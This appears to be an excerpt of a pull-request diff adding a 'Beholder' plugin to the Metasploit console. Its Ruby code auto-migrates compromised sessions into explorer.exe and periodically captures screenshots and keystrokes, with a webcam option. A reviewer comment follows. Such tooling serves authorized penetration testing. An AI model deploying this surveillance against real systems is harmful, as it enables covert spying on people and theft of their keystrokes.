plugins/beholder.rb

```diff
@@ -0,0 +1,336 @@
+
+    def cache_sysinfo(sid)
+      return if self.state[sid][:sysinfo]
+      self.state[sid][:sysinfo] = framework.sessions[sid].sys.config.sysinfo
+      self.state[sid][:name] = "#{sid}_" + (self.state[sid][:sysinfo]['Computer'] || "Unknown").gsub(/[^A-Za-z0-9\.\_\-]/, '')
+    end
+
+    def verify_migration(sid)
+      return unless self.config[:automigrate]
+      return if self.state[sid][:migrated]
+      sess = framework.sessions[sid]
+
+      # Are we in an explorer process already?
+      pid = sess.sys.process.getpid
+      session_log(sid, "has process ID #{pid}")
+      ps = sess.sys.process.get_processes
+      this_ps = ps.select{|x| x['pid'] == pid }.first
+
+      # Already in explorer? Mark the session and move on
+      if this_ps && this_ps['name'].to_s.downcase == 'explorer.exe'
+        session_log(sid, "is already in explorer.exe")
+        self.state[sid][:migrated] = true
+        return
+      end
+
+      # Attempt to migrate, but flag that we tried either way
+      self.state[sid][:migrated] = true
+
+      # Grab the first explorer.exe process we find
+      target_ps = ps.select{|x| x['name'].to_s.downcase == 'explorer.exe' }.first
+      unless target_ps
+        # No explorer.exe process?
+        session_log(sid, "no explorer.exe process found for automigrate")
+        return
+      end
+
+      # Attempt to migrate to the target pid
+      session_log(sid, "attempting to migrate to #{target_ps.inspect}")
+      sess.core.migrate(target_ps['pid'])
+    end
+
+    # Only support sessions that have core.migrate()
+    def compatible?(sid)
+      framework.sessions[sid].respond_to?(:core) &&
+      framework.sessions[sid].core.respond_to?(:migrate)
+    end
+
+    # Skip sessions with ancient last checkin times
+    def stale_session?(sid)
+      return unless framework.sessions[sid].respond_to?(:last_checkin)
+      session_age = Time.now.to_i - framework.sessions[sid].last_checkin.to_i
+      # TODO: Make the max age configurable, for now 5 minutes seems reasonable
+      if session_age > 300
+        session_log(sid, "is a stale session, skipping, last checked in #{session_age} seconds ago")
+        return true
+      end
+      return
+    end
+
+  end
+
+
+  #
+  # Command Dispatcher
+  #
+
+  class BeholderCommandDispatcher
+    include Msf::Ui::Console::CommandDispatcher
+
+    @@beholder_config = {
+      screenshot: true,
+      webcam: false,
+      keystrokes: true,
+      automigrate: true,
+      base: ::File.join(Msf::Config.get_config_root, "beholder", Time.now.strftime("%Y-%m-%d.%s")),
+      freq: 30,
+      # TODO: Only capture when the idle threshold has been reached
+      idle: 0,
+    }
+
+   @@beholder_worker = nil
+
+    def name
+      "Beholder"
+    end
+
+    def commands
+      {
+        'beholder_start'         => "Start capturing data",
+        'beholder_stop'          => "Stop capturing data",
+        'beholder_conf'          => "Configure capture parameters",
+      }
```

Comment:
Thanks @hdm and @wvu-r7. And an excellent addition to the plugins especially for the long term campaigns.